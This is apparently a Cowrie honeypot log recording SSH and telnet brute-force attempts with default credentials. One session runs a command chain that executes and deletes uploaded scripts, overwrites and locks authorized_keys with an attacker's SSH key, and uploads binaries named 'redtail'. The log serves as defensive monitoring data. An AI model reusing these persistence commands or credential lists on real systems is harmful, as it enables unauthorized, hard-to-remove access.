{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T13:30:17.259691Z","src_ip":"212.227.235.229","session":"23a083b0138a"}
{"eventid":"cowrie.login.success","username":"root","password":"zxc123zxc123","message":"login attempt [root/zxc123zxc123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:30:17.589285Z","src_ip":"212.227.235.229","session":"23a083b0138a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59984,"dst_ip":"1.2.3.4","dst_port":22,"session":"e59322d2e1aa","protocol":"ssh","message":"New connection: 212.227.125.160:59984 (1.2.3.4:22) [session: e59322d2e1aa]","sensor":"my-vps","timestamp":"2025-08-28T13:30:18.249855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:30:18.250584Z","src_ip":"212.227.125.160","session":"e59322d2e1aa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:30:18.425366Z","src_ip":"212.227.125.160","session":"e59322d2e1aa"}
{"eventid":"cowrie.login.failed","username":"apache","password":"12345678","message":"login attempt [apache/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T13:30:18.953607Z","src_ip":"212.227.125.160","session":"e59322d2e1aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59224,"dst_ip":"1.2.3.4","dst_port":23,"session":"c7499902f06d","protocol":"telnet","message":"New connection: 212.227.125.160:59224 (1.2.3.4:23) [session: c7499902f06d]","sensor":"my-vps","timestamp":"2025-08-28T13:30:19.603007Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:30:19.686955Z","src_ip":"212.227.125.160","session":"c7499902f06d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:30:20.093077Z","src_ip":"212.227.125.160","session":"c7499902f06d"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:30:20.268494Z","src_ip":"212.227.125.160","session":"e59322d2e1aa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:30:41.487326Z","src_ip":"212.227.235.229","session":"23a083b0138a"}
{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","message":"CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","sensor":"my-vps","timestamp":"2025-08-28T13:30:41.488166Z","src_ip":"212.227.235.229","session":"23a083b0138a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","size":80,"shasum":"4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:30:41.598613Z","src_ip":"212.227.235.229","session":"23a083b0138a"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-28T13:30:41.708216Z","src_ip":"212.227.235.229","session":"23a083b0138a"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-28T13:30:41.710267Z","src_ip":"212.227.235.229","session":"23a083b0138a"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-28T13:30:41.712376Z","src_ip":"212.227.235.229","session":"23a083b0138a"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-28T13:30:41.714504Z","src_ip":"212.227.235.229","session":"23a083b0138a"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-28T13:30:41.717193Z","src_ip":"212.227.235.229","session":"23a083b0138a"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-28T13:30:41.718174Z","src_ip":"212.227.235.229","session":"23a083b0138a"}
{"eventid":"cowrie.session.closed","duration":"24.7","message":"Connection lost after 24.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:30:41.828520Z","src_ip":"212.227.235.229","session":"23a083b0138a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45108,"dst_ip":"1.2.3.4","dst_port":22,"session":"93655a6318f6","protocol":"ssh","message":"New connection: 212.227.125.160:45108 (1.2.3.4:22) [session: 93655a6318f6]","sensor":"my-vps","timestamp":"2025-08-28T13:30:56.184719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:30:56.203368Z","src_ip":"212.227.125.160","session":"93655a6318f6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:30:56.347145Z","src_ip":"212.227.125.160","session":"93655a6318f6"}
{"eventid":"cowrie.login.failed","username":"apache","password":"qwerty","message":"login attempt [apache/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T13:30:56.994443Z","src_ip":"212.227.125.160","session":"93655a6318f6"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:30:58.159308Z","src_ip":"212.227.125.160","session":"93655a6318f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56902,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d69e73e8465","protocol":"ssh","message":"New connection: 212.227.125.160:56902 (1.2.3.4:22) [session: 1d69e73e8465]","sensor":"my-vps","timestamp":"2025-08-28T13:31:33.318686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:31:33.319442Z","src_ip":"212.227.125.160","session":"1d69e73e8465"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:31:33.506607Z","src_ip":"212.227.125.160","session":"1d69e73e8465"}
{"eventid":"cowrie.login.failed","username":"apache","password":"123123","message":"login attempt [apache/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:31:34.210312Z","src_ip":"212.227.125.160","session":"1d69e73e8465"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:31:35.438281Z","src_ip":"212.227.125.160","session":"1d69e73e8465"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46508,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e8d2c73b494","protocol":"ssh","message":"New connection: 212.227.125.160:46508 (1.2.3.4:22) [session: 0e8d2c73b494]","sensor":"my-vps","timestamp":"2025-08-28T13:32:08.832313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:32:08.833880Z","src_ip":"212.227.125.160","session":"0e8d2c73b494"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:32:09.004245Z","src_ip":"212.227.125.160","session":"0e8d2c73b494"}
{"eventid":"cowrie.login.failed","username":"apache","password":"111111","message":"login attempt [apache/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T13:32:09.517360Z","src_ip":"212.227.125.160","session":"0e8d2c73b494"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:32:10.690207Z","src_ip":"212.227.125.160","session":"0e8d2c73b494"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57310,"dst_ip":"1.2.3.4","dst_port":22,"session":"cba1ff14e871","protocol":"ssh","message":"New connection: 212.227.235.229:57310 (1.2.3.4:22) [session: cba1ff14e871]","sensor":"my-vps","timestamp":"2025-08-28T13:32:18.234037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T13:32:18.234754Z","src_ip":"212.227.235.229","session":"cba1ff14e871"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T13:32:18.339734Z","src_ip":"212.227.235.229","session":"cba1ff14e871"}
{"eventid":"cowrie.login.failed","username":"admin","password":"3141","message":"login attempt [admin/3141] failed","sensor":"my-vps","timestamp":"2025-08-28T13:32:18.843821Z","src_ip":"212.227.235.229","session":"cba1ff14e871"}
{"eventid":"cowrie.login.failed","username":"admin","password":"3110","message":"login attempt [admin/3110] failed","sensor":"my-vps","timestamp":"2025-08-28T13:32:19.951247Z","src_ip":"212.227.235.229","session":"cba1ff14e871"}
{"eventid":"cowrie.login.failed","username":"admin","password":"31081994","message":"login attempt [admin/31081994] failed","sensor":"my-vps","timestamp":"2025-08-28T13:32:21.058417Z","src_ip":"212.227.235.229","session":"cba1ff14e871"}
{"eventid":"cowrie.login.failed","username":"admin","password":"31071981","message":"login attempt [admin/31071981] failed","sensor":"my-vps","timestamp":"2025-08-28T13:32:22.167684Z","src_ip":"212.227.235.229","session":"cba1ff14e871"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63360,"dst_ip":"1.2.3.4","dst_port":22,"session":"a767a0fce923","protocol":"ssh","message":"New connection: 217.72.205.35:63360 (1.2.3.4:22) [session: a767a0fce923]","sensor":"my-vps","timestamp":"2025-08-28T13:32:22.585304Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:32:22.586386Z","src_ip":"217.72.205.35","session":"a767a0fce923"}
{"eventid":"cowrie.login.failed","username":"admin","password":"31051984","message":"login attempt [admin/31051984] failed","sensor":"my-vps","timestamp":"2025-08-28T13:32:23.274831Z","src_ip":"212.227.235.229","session":"cba1ff14e871"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:32:24.382547Z","src_ip":"212.227.235.229","session":"cba1ff14e871"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49494,"dst_ip":"1.2.3.4","dst_port":22,"session":"99220d02d5a6","protocol":"ssh","message":"New connection: 212.227.125.160:49494 (1.2.3.4:22) [session: 99220d02d5a6]","sensor":"my-vps","timestamp":"2025-08-28T13:32:43.759683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:32:43.760589Z","src_ip":"212.227.125.160","session":"99220d02d5a6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:32:43.930872Z","src_ip":"212.227.125.160","session":"99220d02d5a6"}
{"eventid":"cowrie.login.failed","username":"apache","password":"1234567","message":"login attempt [apache/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T13:32:44.446307Z","src_ip":"212.227.125.160","session":"99220d02d5a6"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:32:45.619297Z","src_ip":"212.227.125.160","session":"99220d02d5a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42664,"dst_ip":"1.2.3.4","dst_port":22,"session":"a487a7e17bf1","protocol":"ssh","message":"New connection: 212.227.235.229:42664 (1.2.3.4:22) [session: a487a7e17bf1]","sensor":"my-vps","timestamp":"2025-08-28T13:33:16.574448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:33:16.575348Z","src_ip":"212.227.235.229","session":"a487a7e17bf1"}
